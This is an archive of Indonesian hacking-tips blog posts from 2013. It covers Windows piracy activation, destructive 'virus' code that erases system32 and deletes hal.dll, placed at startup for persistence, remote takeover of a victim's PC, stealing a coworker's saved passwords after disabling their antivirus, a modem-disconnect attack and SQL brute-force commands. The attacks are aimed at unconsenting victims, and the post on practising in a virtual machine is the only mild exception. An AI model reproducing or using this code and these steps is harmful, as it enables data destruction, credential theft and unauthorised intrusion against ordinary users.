Jumat, 12 April 2013

Cara Membuat Windows XP Bajakan Menjadi Asli (Genue)






 Buat pecinta windows XP dan masih setia menggunakan windows Xp sampai sekarang, ada tips menarik yaitu merubah Windows XP bajakan menjadi asli (genuine) terutama buat teman-teman yang mengunakan Window XP bajakan.
   Download dulu Software untuk mengecek keaslian windows XP anda Di siniExtrak file yang di download tadi, Buka software dengan klik 2x di file tadi, jika muncul seperti gambar di bawah ini maka Windows XP Ente asli/genuine jadi tidak perlu di aslikan lagi

   Namun jika tidak seperti gambar diatas tadi berarti Windows XP Ente  bajakan
Berikut Langkah-langkah untuk merubah windows XP bajakan/palsu menjadi genuine / asli:
Download dulu Software "KeyFinder" berserta Key Windows asli untuk merubah Product Key Windows,Download Disini
Extrack kedua file tersebut
Kemudian jalankan program "KeyFinder"
klik "options" --> "Change Windows Key"
terlihat seperti gambar dibawah:


   Masukan salah satu product key asli yang ada di folder KeyFinder tadi , kemudian klik change.
Setealah itu keluarkan program "keyfinder" dan buka ulang lagi, disana akan terlihat kalau product key windows sobat sudah digantikan dengan key asli yang tadi dimasukan.

Selesai... Sekarang silahkan cek kembali apakah Windows XP Ente sudah asli/genuine seperti cara pertama di atas tadi..
--SELAMAT MENCOBA--
Sumber

Cara Membuat Windows 7 Bajakan Menjadi Original Asli (Genuine)







Windows 7 merupakan Sistem Operasi yang banyak di idolakan orang banyak. Salah satunya, Ane.
Baru-baru ini Ane Nyoba Pake Windows 7. Dan hasilnya luar biasa, menakjubkan *Karena baru pertama kali install di PC sendiri. Dari segi Tampilan, Kecepatan, Windows 7 memang di unggulkan *Kalo menurut Ane Hehee.. :D.
Oke Langsung Ajah Nie Tutorial Nya...
Download Dulu Activator Chew WGA 0.9 Di SiniKlo Udah Selsai, Extract dan buka Folder tersebut. Lalu jalankan aplikasinya "CW.eXe".
   Hanya dengan sentuhan beberapa klik saja, Windows 7 Ente Udah berhasil Genuine Hehee...:D.
Nie screenshots bukti asli dengan menggunakan Activator Chew WGA 0.9.

Semoga Informasi Tips dan Trik mengenai Windows 7 ini bisa bermanfaat.
--SELAMAT MENCOBA--
Sumber

Cara Mengganti Tulisan Welcome & Shutting Down pada Windows 7/vista



Bagaimana mengganti tulisan welcome pada saat pertama kita menghidupkan laptop atau komputer serta merubah tulisan shuting down pada saat kita mematikan komputer/laptop sesuai dengan kehendak kita??. Adapun caranya adalah sebagai berikut :
1. Download dan Install software [Resourche Hacker : 731 KB] klik disini password omkris2. Buka Windows Explorer, arahkan ke C: \ Windows \ System32 \ en-US \ winlogon.exe.mui . (Lihat gambar di bawah - Klik setiap gambar untuk perbesar)
nstall software [Resourche Hacker
3. Copy dan Paste winlogon.exe.mui file ke documents sobat (untuk memudahkan pencarian)
Catatan penting !!! Copy juga file asli ini dan paste ke drive D atau E. ini agar kita bisa mengembalikannya seperti semula (default) jika sewaktu-waktu sobat ingin mengembalikannya.
4. Klik kanan pada Resource Hacker di Start Menu - All Programs, kemudian klik pada Run as administrator . (Lihat gambar di bawah)
Run as administrator
5. Klik File - Open arahkan ke  documents sobat , pilih All Files (*. *) di Files of type drop down box, pilih winlogon.exe.mui file, kemudian klik pada Open. (Lihat gambar di bawah)
Klik File - Open arahkan ke  documents
6. Untuk mengganti tulisan Welcome Di panel kiri Resource Hacker, klik String Table - pilih  63 dan klik 1033 ganti tulisan sesuai kehendak sobat. saya kasih contoh disini diganti dengan merubahnya menjadi Selamat datang di Dun-soft Windows kemudian klik Compile Script (Lihat gambar di bawah)
klik String Table
klik Compile Script
7. Untuk mengganti tulisan Windows Shutting down dan lain lain Di panel kiri Resource Hacker, klik String Table - pilih  69 dan klik 1033 ganti tulisan sesuai kehendak sobat. saya kasih contoh disini diganti dengan merubahnya menjadi Komputer Dun-soft akan segera dimatikan kemudian klikCompile Script (Lihat gambar di bawah)
Shutting down dan lain lain
Compile Script
8. Klik save nanti akan muncul 2 yaitu winlogon.exe_original.mui dan winlogon.exe.mui  copyyang dimodifikasi winlogon.exe.mui bukan yang winlogon.exe_original.mui pada documents sobat, dan Paste ke dalam C: \ Windows \ System32 \ en-US folder. pilih opsi copy and replace.


Dan inilah cara mengganti tulisan Shutting down-nya :
  1. Lakukan langkah 2, 3, 4 dan 5 hanya saja yang winlogon.exe.mui diganti denganwininit.exe.mui
  1. Buka Windows Explorer, arahkan ke C: > Windows > System32 > en-US > wininit.exe.mui.  wininit.exe.mui. ingat!! yang asli di copy atau di backup dulu, biar nanti kalau mau dikembalikan lagi/ ada masalah tidak merepotkan. 
  1. Lokasi :  Di panel kiri Resource Hacker, klik String Table - pilih  63 dan klik 1033 ganti tulisan shutting down sesuai kehendak


Selesai restart komputer/ selamat mencoba.

Source: OM Kris & Dun-soft.blogspot.com

Sabtu, 06 April 2013

Cara Membuat Virus Mematikan Cuma dengan "Notepad"


Membuat virus? Berbahaya enggak? Tentu saja virus berbahaya, namun tutorial kali ini akan membahas cara membuat virus sederhana yang dari paling tidak berbahaya, hingga yang berbahaya
Langkah-langkah
1. Buka Notepad
2. Copy Code dibawah ini
lol=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning")
3. Save dengan format .vbs (ex : virus1.vbs). Simpan juga dengan format all file
4. Jalankan Virusnya
5. Akan muncul pilihan yes or no. Pilih saja salah satu (Yes atau No). Tidak akan terjadi apa-apa kok.
Note : Pesan yang muncul bisa diganti-ganti. Dan jika mau program itu aktif ketika komputer startup, letakkan programnya di C:\Documents and Settings\*namauser*\Start Menu\Programs\Startup.
* * *
Virus Batch Sederhana manthabmanthab
Virus yang kali ini cukup berbahaya, namun tidak merusak. Jika mau mencoba, silakan coba di komputer lain, jangan di komputer pribadi.
Langkah-langkah
1. Buka Notepad
2. Copy Code di bawah ini
Virus terdeteksi // Title buat window
xxx // sub skrip xxx
msg * mencoba mendelete viruz // pesan
erase "C:\WINDOWS\system32" // menghapus system32
start xxxx.bat // menjalankan file xxxx.bat yg disimpan pada folder yang sama
msg * percobaan gagal,mencoba kembali // pesan
goto xxxx // eksekusi xxxx.bat
3. Save dengan nama xxx.bat (Jadikan all file, jangan .txt)
4. Buka Notepad (Notepad baru)
5. Copy kode berikut
Viruz // mengubah window title
msg * Wah2 komputer anda kena viruz// pesan di message box
del // Delete files /// "del c:" mengapus file yg di c:
erase // sama kyk del
start xxxx.bat // memulai xxxx.bat
xxx // sub skrip
goto // ke subskrip
6. Save dengan nama xxxx.bat( Jadikan all file,,simpan di folder yg sama dengan file yang pertama)
7. Jika mau menjalankannya, jalankan yang xxxx.bat
8. Jika mau menjalankannya ketika komputer Startup Copy ke C:\Documents and Settings\*nama user*\Start Menu\Programs\Startup.
* * *
Virus Berbahaya hammerhammer
Virus yang ini mungkin dikategorikan berbahaya, dikarenakan bisa menghapus file .dll dan membuat komputer tak bisa booting. Jadi hati-hati, kalau mau coba, coba di komputer yang udah mau rusak aja.
Langkah - langkah
1. Siapkan tool C++ (Seperti dev c Portable dan yang sejenis)
2. Copy Code di bawah ini
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove(”C:\\windows\\system32\\hal.dll”); //PWNAGE TIME
system(”shutdown -s -r”);
system(”PAUSE”);
return EXIT_SUCCESS;
}
3. Program ini akan menghapus hal.dll , jadi jangan dieksekusi karena bisa menyebabkan gagal booting.
4. Kalau mau yang advance, copy code di bawah ini
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove(”%systemroot%\\system32\\hal.dll”); //PWNAGE TIME
system(”shutdown -s -r”);
system(”PAUSE”);
return EXIT_SUCCESS;
}
5. Perbedaan dengan kode yang pertama adalah pada proses pencarian directory system secara sistem. (Kode pertama hanya bisa menghapus kode hal.dll jika dilteakkan di directory C: , sedangkan ini akan otomatis mencari.
6. Jangan coba di komputer yang masih normal-normal. Coba di komputer yang kira-kira sudah rusak berat saja.

Membuat Password Pada Folder Penting



Cara Memberi/Memasang Password Pada Folder- Terkadang ada file atau informasi yang tersimpang didalam suatu folder komputer yang menurut kita sangat rahasia sehingga orang lain tidak dapat membuka apalagi membaca file tersebut. Seperti yang sifatnya pribadi, rahasia perusahaan, rekam medis dan sebagainya. Dengan kata lain folder tersebut harus diproteksi dengan password. oleh karena itu di butuhkan Cara Membuat Password Pada Folder.
Banyak sekali software untuk mengunci sebuah file atau folder agar tidak mudah diakses orang lain. Dengan keyword “Lock Folder Software” maka akan didapati sekian banyak software yang menawarkan proteksi untuk file atau folder. Dengan berlabel Free Download / Trial -> dan setelah diinstall maka kita disuruh mendaftar (register) dan akhirnya kita disuruh membeli.
Buka NOTEPAD Dengan Klik Start -> All Programs -> Accessories -> Notepad
Cara berikut ini adalah cara yang paling gampang dan tidak harus bayar. Ikuti trik Cara Membuat Password Pada Folder berikut ini :

1. Copy dan Paste-kan kode dibawah ini kedalam Notepad

cls
@ECHO OFF
title Folder Locker
if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p “cho=>”
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
attrib +h +s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p “pass=>”
if NOT %pass%==PasswordAnda goto FAIL
attrib -h -s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
ren “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
Catatan: PasswordAnda -> Ganti dengan password yg anda inginkan.

2. Simpan file tersebut dengan Nama FolderLock.Bat pada folder yang akan dikunci
3. Tutup dan kemudian buka lagi file tersebut, dan akan membuat folder penting.
4. Ketikkan kode password Anda
5. Klik lagi, dan akan tertampil perintah “Do you want to lock the file Y/N“.
6. Ketikkan “Y” dan tekan Enter.
7. Untuk membuka folder penting, masukkan password anda yang tadi.

Jangan Lupa: PasswordAnda -> Ganti dengan password yg anda inginkan.
Selamat mencoba dan mempraktekkannya :)

Membuat & Memasukan Trojan Horse Ke Komputer Lain tanpa instalansi Server



(MOHON TIDAK DISALAHGUNAKAN)
Dengan menggunakan Atelier web remote comander(AWRC) kita bisa memasukan trojan Horse dan mengambil alih seluruh kegiatan di komputer Korban seperti menyetel musik, membuka tutup CD-ROM, Melihat isi Komputer, Mengambil File dan Banyak lagi, Inilah kemampuan Hebat AWRC( Download di www.atelierweb.com) Software ini dikatakan menggunakan teknologi militer(Nggak tau nih bener nggak)

Anda sama sekali tidak perlu menginstall server di komputer korban!!! Walaupun anda harus mengetahui password administor komputer korban tapi ini tetap mengagumkan. Tidak perlu “Instalasi ” Server tidak berarti tidak perlu menjalankan. Sebenarnya tetap harus ada program yg dijalankan korban agar program ini berhasil. Untuk Lebih mudahnya langsung kita coba saja….Untuk itu Download AWRC dan lakukan instalansi lalu buka Atelier web remote comander dari menu…

Tampilan Atelier Web Remote Commander
1.Masukan Alamat IP Komputer Korban( Di kolom RemoteHost)
2.Masukan username dan password Korban( Di Kolom Username & Password)
3.Klik Tombol Conect untuk lakukan Koneksi.
4.Lihat Kolom Progress report (di bagian bawah kiri) untuk menampilkan status koneksi, Jika koneksi berhasil Anda akan melihat pesan Conected to xx.xx.xx.xx(IP Korban) atau Conection Failed jika koneksi gagal.
5.Jika Berhasi anda akan melihat tampilan destkop komputer remote(Komputer Korban)
6.Anda bisa mengatur ukuranya dengan Fasilitas Scale.
ALASAN KONEKSI GAGAL:
Sangat mungkin terjadi walaupun suda tahu username dan pass korab karena sist. operasi yg tidak mendukung. ALASAN lainya adalah service Client for Microsoft networking dan File and printer sharing tidak aktif pada komputer korban. P?ada win XP profesional ada persyaratan tambahan yaitu setting model sharing and security harus diubah(Cllasic sharing and security model for local account) caranya:
Start > Control panel >  Administrative tools > Local Security Policy > Security setting > Local policies > Security option > Network access: Security setting and security model for local account > Classic-Local user authenticate as themselves.
Kelebihan lain dari AWRC adalah portnya yang tidak mudah dicurigai antivirus…
Kalo masih ada yang bingungin tanyain aja…
Sumbernya dari Buku Seni Teknik Hacking 1 karya S’TO

Hacking: Tool Kecil Pembobol Pasword E-Mail,FS,FB, Game dll



(MOHON JANGAN DISALAHGUNAKAN)
Ada dua tool kecil yang gedenye cuma 40KB tapi khasiatnya muantaaaaaaab…dan tanpa perlu di instal, langsung di jalanin..saya contohin, misalnye ente pengen tau password email, fs dsb dari temen kerja kamu yang ada di samping kamu.

Caranye, kamu tunggu dia cabut dari kursinye. Pas dia ninggalin tuh kursinye, kamu jalanin aje tuh tool via Flashdisk atau floppy.
Tapi sebelumnye ente disable dulu anti virus di tuh kompi, soalnye kalo ga bakal ke ditek jadi trojan (yang jelas ni tool bukan virus).
Abis ntu…..dicoba jalanin deh.
Jreng—-jreng!!!!….semua password yang beberapa menit lalu pernah dimasukin sama temen kamu, bakal kebuka tanpa kecuali. Hebat kan?
Jadi intinye ni tool bakal nyedot semua password yang tersimpan di cookies dari kompi yang abis di pake wat ngenet. Gityu bro.
Untuk calon victim nyang pake Firefox download:
http://www.ziddu.com/download/2960500/p … x.zip.html
Untuk calon victim nyang pake Internet Explorere
http://www.ziddu.com/download/2960521/I … r.zip.html
Kelemahan: Komputer yg mau dipakai tidak boleh direstart atau dimatikan.
Dari Forum Jasakom.

Cara bikin virus mainan tapi susah dihapus…


sekarang kita mo blajar cara buat virus, tapi virus yg mau kita buat ini virusnye kaga bahaya bisa di bilang “sekedar hanya virus mainan” yg mungkin bisa nakut-nakutin komptrnya temen kita. Langkahnya benar-benar simpel:

nah___cara buatnya kita kudu masuk ke DOS Prompt dulu, trus lo masuk ke direktory : desktop
C:\Windows\desktop
klo kaga ngerti caranya masuk ke direktory desktop, gini caranya :
ketik CD WINDOWS abis itu di ENTER
trus lo ketik DESKTOP trus di ENTER
klo smua itu udah di lakuin maka baris itu akan menjadi kaya’ gini :
C\WINDOWS\Desktop>
abis itu lo ketik parameter yg kaya’ begini :
MD 2003 VIRUS
tapi waktu ngetik ada beberapa yg menti kalian inget n’ di perhatikan : diantara MD dan 2003 harus ada spasi, tapi setelah lo ketik 2003 kalian kudu tekan dan tahan tombol ALT pada keyboard, sambil neken tombol ALT, lo masukin angka 255. Pas ngetik angaka itu emang kaga kliatan trus lo lepas tombol ALT yg lo tekan tadi. Nah___apa yg terjadi? ALT+255 itu tadi jadi spasi……yg terakhir baru kita ketik VIRUS….
dengan perintah yg kaya’ gitu berarti membuat karakter spasi yg tidak dapat terhapus oleh windows
pasti temen lo bingung____knp kompi-nya ada virus yg kaga bisa ilang dari desktopnya, walopun make antivirus yg paling handal virusnya tetep kaga ilang _____

klo ingin hapus folder virus itu tadi : pada dasarnya kebalikan dari cara pembuatan virus tadi. kaya gini caranya :
lo masuk ke dalam DOS Prompt trus ganti MD menjadi RMDIR

Perangkat Hacking Wireles


AiO Wireless Hack Tools 2009:
• NetStumbler 0.4.0
• Kismet 2005 08 R
• Wellenreiter v1.9
• WEP Crack 0.1.0
• Airsnort 0.2.7e
• Wepwedgie 0.1.0 alpha
• Hotspotter 0.4
Information File:
Name: AIO Wireless Hack Tools 2009 Full
Size: 8,1 MB (recovery register 1%)
Language: English
Support Platform: Linux, Windows.
Format: RAR
Downloadfile : http://rapidshare.com/files/15193020…asFull.CoM.rar


Sumber: http://trikstips.wordpress.com

Disconect Modem Lawan


Sangat mudah untuk koneksi ke internet dengan modem. tapi, tahukan gimana komputer berkomunikasi dengan modem..??? Biar kita ngerti gimana cara mereka berkomunikasi,
klik tombol Sart -> Control Panel -> Phone and Modem Option -> (pilih modem yg akan digunakan) -> Properties.

Di form Properties Modem, pilih menu Diagnostics, lalu klik tombol Query Modem(1),coba perhatikan pd kolom Command dan Response(2), terdapat printah/command yg smuanya dimulai huruf AT(ATtention).

Perintah AT juga bisa dilakukan secara manual melalui HiperTerminal, untuk melakukan suatu dial ke suatu nomor, digunakan perintah ATDT(ATtention Dial by Tone) atauATDP(ATtention Dial by Pulse). contohnya saat kita mengkoneksikan ke Internet dgn nomor 080989999, maka yg dilakukan scara internal adalah penggunaan perintah ATDT 080989999 ato ATDP 08098999.
saat modem OnLine, printah AT tidak bisa diberikan ke modem karna printah-printah tersebut akan dianggap data untuk transfer.
So… gimana biar modem bisa diprintah agar dia melakukan disconnect jika saat modem OL tidak bisa diberikan printah..???
jawabannya yaitu dengan memanfaatkan kode “+++”, kode ini disebut ialah escape charcters yang memungkinkan kita memberikan perintah ATH0 yang akan memerintahkan modem untuk melakukan disconnect dengan perintah “+++ATH0″.
Dengan mengirimkan data +++ATH0 kekomputer korban dengan modem yang bermasalah akan diterjemahkan sebagai printah untuk modem agar melakukan disconnect, namun jika modem kita juga bermasalah, bisa – bisa modem kitalah yang pertama kali akan melakukan disconnect.
cara melakukannya bisa menggunakan telnet…
Namun yg g ngerti menggunakan telnet , ada program yang sangat mudah digunakan yang bernama ROCKET(Khusus bagi pengguna windows) yang dibuat oleh Misoskian.
Download di http://www.ziddu.com/download/3094152/RocketV1_0.exe.html
caranya hanya dengan cara memasukkan alamat IP korban pada Target IP,
isikan Data nya dgn +++ATH0,
trus klik SEND PACKET.

Gampang kan???
Cara pencegahanya akan saya bahas pada lain waktu
SUMBER: SENI TEKNIK HACKING(S’TO)

FORCESQL V2.0, SOFTWARE PENEBAK PASSWORD PALING SIMPEL


ForceSQL V2.0 adalah hacking tools milik Network Intelligence India Pvt. Ltd yang bias di download secara gratis di http://www.nii.co.in/tools.html. Namun, situs tersebut telah tutup, saat ini  tapi kalian tetep bisa download dgn link yg ada di bawah, fungsi dari software tersebut, sangat penting dalam melakukan serangan ke server menggunakan teknik Brutus.
Fitur terbaru dari versi 2 ini adalah :
1. Perintah baris yang mudah
2. Dictionary Attack
3. Brute Force Attack
4. Lebih cepat dari versi sebelumnya
5. User Friendly
6. Kapasitas file yang ringan, yakni hanya 192 KB
Cara penggunaannya, cukup dengan memasukkan IP Address server atau User ID yang ingin di tebak. JIka memilih teknik Brute Force, masukkan karakternya di file ‘charset.txt’. Pastikan kamus password dan username di file word.txt yang berada dalam satu folder yang sama dengan ForceSQL.exe.
Cara Penggunaannya :
1. For the Dictionary Attack:
forceSQL [IP] [UserID] -d
2. For the Brute Force Attack:
forceSQL [IP] [UserID] -b [length]
Untuk mendownloadnya, klik di sini.
Sumbernya dri sini:http://www.berita86.com/2009/04/forcesql-v20-software-penebak-password.html

Latihan hacking dengan virtual machine.


Menjadi hacker, harus banyak membaca dan latihan mencari cela suatu keamanan di suatu sistem. Internet adalah jawaban semua itu, di internet kita dapat menemukan berbagai sistem yang dapat kita gunakan untuk pentes. Di internet juga kita dapat berlatih untuk melakukan hacking/security test, dan mendapatkan e-book secara gratis.


Namun sayangnya di negri kita tercinta ini, internet terbilang mahal (kecuali bagi sebagian kalangan). Dengan demikian rasanya sulit untuk berkembang. Namun dengan keterbatasan kita harus tetap maju, begitulah seharusnya yang dilakukan oleh seorang hacker.
Ada alternatif yang murah dan menyenangkan. Yaitu kita menggunakan mesin virtual seperti VMWare, Virtualbox, Qemu, dll. Dengan mesin virtual ini kita bisa memvirtualisasikan sistem di dalam komputer kita. Hal ini adalah suatu keharusan bila Anda ingin mendapatkan predikat 31137.
Misalnya kita ingin menghack server freebsd, maka kita sebenarnya tidak perlu terhubung ke internet, install saja freebsd di dalam mesin virual. Lalu setelah itu baru kita berkesperimen. Keuntungannya ada 2, selain kita bisa menyerang target dengan murah (tanpa terhubung saluran internet), kita juga dapat mengetahui bagaimana membuat (menginstall) sistem freebsd itu.
Begitu juga bila ingin menghack website target kita, coba lihat CMS apa yang digunakan target misal joomla v.1.5 dan freebsd OS, maka installasi joomla v.1.5 pada mesin virtual freebsd. Setelah itu Anda dengan bebas dapat melakukan pentes tanpa takut dipenjara karena tindakan ilegal Anda.
Bila kita melakukan hal tsb dan berhasil, Anda langsung dapat menghajar target sewaktu terhubung ke inet. Selain itu, Anda juga dapat merasakan bagaimana susahnya melakukan attacking, dan lebih susah lagi membuat sistem dan mem-patch-nya. Dengan demikian etika Anda akan terbentuk, karena jiwa kemanusiaan Anda tumbuh, karena selain Anda menyerang target, Anda juga telah berproses (merasakan susahnya) membuat suatu sistem komputer.
Semua itu dimulai dari mesin virtual, untuk itu, install mesin virtual di komputer Anda sekarang juga (Virtualbox atau VMWare). Buat sistem Anda dan serang sistem Anda sendiri. Langkah selanjutnya adalah patching sistem Anda sendiri. Anda bisa merasakan indahnya hidup ini.
Sudahkah Anda menginstall mesin virual di komputer Anda???
Tambahan Edit:

Untuk install vmware dan konfigurasi jaringan sederhana ada di sini:
http://do-whateverlive-id.blogspot.c…al-vmware.html

Untuk install virtualbox dan konfigurasinya ada di sini
http://linuxindo.web.id/2008/05/17/m…an-virtualbox/
Selanjutnya tinggal ente explorasi lebih dalem 
Setelah sistem terbangun, maka saatnya berlatih untuk mengeksploitasi sistem…
1. Pertama kita butuh referensi (ane pribadi suka http://www.exploit-db.com yang katanya penerus milw0rm).
Ada banyak PoC yang dapat dicoba misalnya exploitasi CMS joomla versi lama:
http://www.exploit-db.com/exploits/6234
2. Maka langkah selanjutnya adalah kita harus menginstall sistem operasi di virtual machine (vmware/virtualbox) jangan lupa menyetting jaringannya juga 
3. Kemudian menginstall web server apache (karena joomla butuh web server php)
4. Download joomla sesuai dengan versi yang tertulis pada referensi (no 1) lalu instalasikan di virtual machine kita.
5. Sekarang silahkan exploitasi sesuka ente menggunakan web browser kompie yang mengakses web server mesin virtual kita.
6. Buat catatan apa saja yang telah ente lakukan dan berbagilah dengan orang lain 
7. Jangan lupa cari tahu cara nge-PATCH-nya supaya tidak bisa dihack lagi

Tutorial Video-video hacking dari Career Hacking Academy


Lagi-lagi video hacking bertebaran secara gratis. Yup, baru-baru ini ilmuwebsite staff menemukan harta karun luar biasa, video hacking academy, mulai dari Ethical Hacking, Penetration Testing, Footprinting, Reconnaissance, TCP IP Basics ,Scanning, Honeypots, Honeynets sampai dengan wireless hacking pun dibahas dalam video. Yang lebih menarik lagi, didalamnya di sediakan demo penetration testing lebih dari 300+ vulnerability. :D —- dan tentunya sebanding dengan kapasitasnya yang lebih dari 3 GB.
Silahkan bagi yang tertarik untuk mendownloadnya :

-Training Module 1 Ethical Hacking and Penetration Testing – cd 1
-Training Module 2 Footprinting and Reconnaissance – cd 2
-Training Module 3 TCP IP Basics and Scanning – cd 3
-Training Module 4 Enumeration and Verification – cd 4
-Training Module 5 Hacking Defending Wireless Modems – cd 5
-Training Module 6 Hacking Defending Web Servers – cd 6
-Training Module 7 Hacking Defending Web Applications – cd 7
-Training Module 8 Sniffers and Session Hijacking – cd 8
-Training Module 9 Hacking Defending Windows Systems – cd 9
-Training Module 10 Hacking Defending Unix Systems – cd 10
-Training Module 11 Rootkits Backdoors Trojans Tunnels – cd 11
-Training Module 12 Denial of Service and Botnets – cd 12
-Training Module 13 Automated Pen Testing Tools – cd 13
-Training Module 14 Intrusion Detection Systems – cd 14
-Training Module 15 Firewalls – cd 15
-Training Module 16 Honeypots and Honeynets – cd 16
-Training Module 17 Ethics and Legal Issues – cd 17
http://rapidshare.com/files/194379379/Gxc.VT.CAHPTaCT_UDS.part01.rar
http://rapidshare.com/files/194382133/Gxc.VT.CAHPTaCT_UDS.part02.rar
http://rapidshare.com/files/194377149/Gxc.VT.CAHPTaCT_UDS.part03.rar
http://rapidshare.com/files/194377617/Gxc.VT.CAHPTaCT_UDS.part04.rar
http://rapidshare.com/files/194379332/Gxc.VT.CAHPTaCT_UDS.part05.rar
http://rapidshare.com/files/194377712/Gxc.VT.CAHPTaCT_UDS.part06.rar
http://rapidshare.com/files/194377133/Gxc.VT.CAHPTaCT_UDS.part07.rar
http://rapidshare.com/files/194379107/Gxc.VT.CAHPTaCT_UDS.part08.rar
http://rapidshare.com/files/194379430/Gxc.VT.CAHPTaCT_UDS.part09.rar
http://rapidshare.com/files/194377280/Gxc.VT.CAHPTaCT_UDS.part10.rar
http://rapidshare.com/files/194379072/Gxc.VT.CAHPTaCT_UDS.part11.rar
http://rapidshare.com/files/194380389/Gxc.VT.CAHPTaCT_UDS.part12.rar
http://rapidshare.com/files/194379054/Gxc.VT.CAHPTaCT_UDS.part13.rar
http://rapidshare.com/files/194379376/Gxc.VT.CAHPTaCT_UDS.part14.rar
http://rapidshare.com/files/194377484/Gxc.VT.CAHPTaCT_UDS.part15.rar
http://rapidshare.com/files/194379264/Gxc.VT.CAHPTaCT_UDS.part16.rar
http://rapidshare.com/files/194380491/Gxc.VT.CAHPTaCT_UDS.part17.rar
http://rapidshare.com/files/194379192/Gxc.VT.CAHPTaCT_UDS.part18.rar
http://rapidshare.com/files/194379700/Gxc.VT.CAHPTaCT_UDS.part19.rar
http://rapidshare.com/files/194377767/Gxc.VT.CAHPTaCT_UDS.part20.rar
http://rapidshare.com/files/194378937/Gxc.VT.CAHPTaCT_UDS.part21.rar
http://rapidshare.com/files/194380403/Gxc.VT.CAHPTaCT_UDS.part22.rar
http://rapidshare.com/files/194379344/Gxc.VT.CAHPTaCT_UDS.part23.rar
http://rapidshare.com/files/194377766/Gxc.VT.CAHPTaCT_UDS.part24.rar
http://rapidshare.com/files/194381936/Gxc.VT.CAHPTaCT_UDS.part25.rar
http://rapidshare.com/files/194379027/Gxc.VT.CAHPTaCT_UDS.part26.rar
http://rapidshare.com/files/194379882/Gxc.VT.CAHPTaCT_UDS.part27.rar
http://rapidshare.com/files/194379279/Gxc.VT.CAHPTaCT_UDS.part28.rar
http://rapidshare.com/files/194377828/Gxc.VT.CAHPTaCT_UDS.part29.rar
http://rapidshare.com/files/194379311/Gxc.VT.CAHPTaCT_UDS.part30.rar
http://rapidshare.com/files/194385532/Gxc.VT.CAHPTaCT_UDS.part31.rar
http://rapidshare.com/files/194385469/Gxc.VT.CAHPTaCT_UDS.part32.rar
http://rapidshare.com/files/194383279/Gxc.VT.CAHPTaCT_UDS.part33.rar
http://rapidshare.com/files/194385282/Gxc.VT.CAHPTaCT_UDS.part34.rar
http://rapidshare.com/files/194385524/Gxc.VT.CAHPTaCT_UDS.part35.rar
http://rapidshare.com/files/194385305/Gxc.VT.CAHPTaCT_UDS.part36.rar
http://rapidshare.com/files/194381537/Gxc.VT.CAHPTaCT_UDS.sfv
mirror  :
http://www.megaupload.com/?d=HROI2ZAV
http://www.megaupload.com/?d=242ZNM7E
http://www.megaupload.com/?d=QY14I10X
http://www.megaupload.com/?d=NHOLUTCO
http://www.megaupload.com/?d=Y9BSB284
http://www.megaupload.com/?d=5GCV9UA3
http://www.megaupload.com/?d=J41JSY0G
http://www.megaupload.com/?d=TXKSRAI8
http://www.megaupload.com/?d=DHF8UMKY
http://www.megaupload.com/?d=RLXSOPTK
http://www.megaupload.com/?d=5O0YFY79
http://www.megaupload.com/?d=RLHUHJDS
http://www.megaupload.com/?d=YNVEK8LB
http://www.megaupload.com/?d=RNYWZ64V
http://www.megaupload.com/?d=J42I6OSZ
http://www.megaupload.com/?d=1EC6S73S
http://www.megaupload.com/?d=25CAZSL2
http://www.megaupload.com/?d=0BZ0FPO1
http://www.megaupload.com/?d=JRPO74HU
http://www.megaupload.com/?d=Z6S34VR6
http://www.megaupload.com/?d=TDXJH9JZ
http://www.megaupload.com/?d=GNCSKLL3
http://www.megaupload.com/?d=LYI3SY94
http://www.megaupload.com/?d=8D3E0R6O
http://www.megaupload.com/?d=0022RC7Z
http://www.megaupload.com/?d=ASMBUELW
http://www.megaupload.com/?d=5XMX3AIZ
http://www.megaupload.com/?d=IPWD9NSU
http://www.megaupload.com/?d=DWQ3469B
http://www.megaupload.com/?d=WL91FDR7
http://www.megaupload.com/?d=TISTATGB
http://www.megaupload.com/?d=1OTQAHLA
http://www.megaupload.com/?d=Q2JTKAHH
http://www.megaupload.com/?d=OUNUNGAP
http://www.megaupload.com/?d=K4GMUQYF
http://www.megaupload.com/?d=QJNKWK0H
http://www.megaupload.com/?d=HP3D8TLB

CARA MENDETEKSI KELEMAHAN WEBSITE


Cara Mendeteksi Kelemahan Website Dengan Acunetix Web Vulnerability Scanner

Website atau blog adalah media untuk menumpahkan isi hati dan juga isi pikiran kita dalam bentuk tulisan, kalau pada zaman dulu kebanyakan orang-orang menumpahkan isi hati dan pikirannya hanya pada buku diary saja, tapi di zaman yang serba modern ini kebanyakan sudah beralih kepada dunia maya atau internet seperti facebook, friendster, blog/website dll.  Namun bagi anda yang mempunyai website patut waspada, karena saat ini banyak sekali cracker-cracker yang bergentayangan didunia maya dan siap mengacak-acak isi website anda, dan cracker bisa melakukan aksinya dengan berbagai cara diantaranya dengan menggunakan tools maupun dengan cara manual demi mendapatkan password admin melalui exploit atau bugs yang terdapat dalam suatu website.
